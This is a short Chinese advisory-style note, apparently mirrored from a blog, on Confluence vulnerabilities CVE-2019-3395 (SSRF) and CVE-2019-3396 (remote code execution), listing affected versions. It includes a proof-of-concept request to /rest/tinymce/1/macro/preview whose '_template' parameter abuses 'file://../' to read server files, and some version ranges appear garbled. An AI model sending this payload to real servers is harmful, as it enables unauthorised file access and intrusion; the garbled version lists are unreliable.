zoukankan      html  css  js  c++  java
  • 应用安全

    CVE-2019-3395

    Date:
    2019-04-09
    
    类型:
    SSRF
    
    影响范围:
    • Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
    • Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
    • Confluence 6.6.* < 6.6.12
    • Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
    • Confluence 6.12.* < 6.12.3
    • Confluence 6.13.* < 6.13.3
    • Confluence 6.14.* < 6.14.2

    CVE-2019-3396

    Date:
    2019-04-09
    
    类型:
    远程代码执行

    复现
    POC
    /rest/tinymce/1/macro/preview
    {"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}}

    影响范围:
    • Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
    • Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
    • Confluence 6.6.* < 6.6.12
    • Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
    • Confluence 6.12.* < 6.12.3
    • Confluence 6.13.* < 6.13.3
    • Confluence 6.14.* < 6.14.2                                                     
  • 相关阅读:
    python
    python
    python
    python
    python
    python-接口自动化 token 的处理
    如何顺利度过试用期?
    印象深刻-bug汇总
    go 实现1000以内的数字,输入35 输出三十五
    jenkins 汉化
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11943078.html
Copyright © 2011-2022 走看看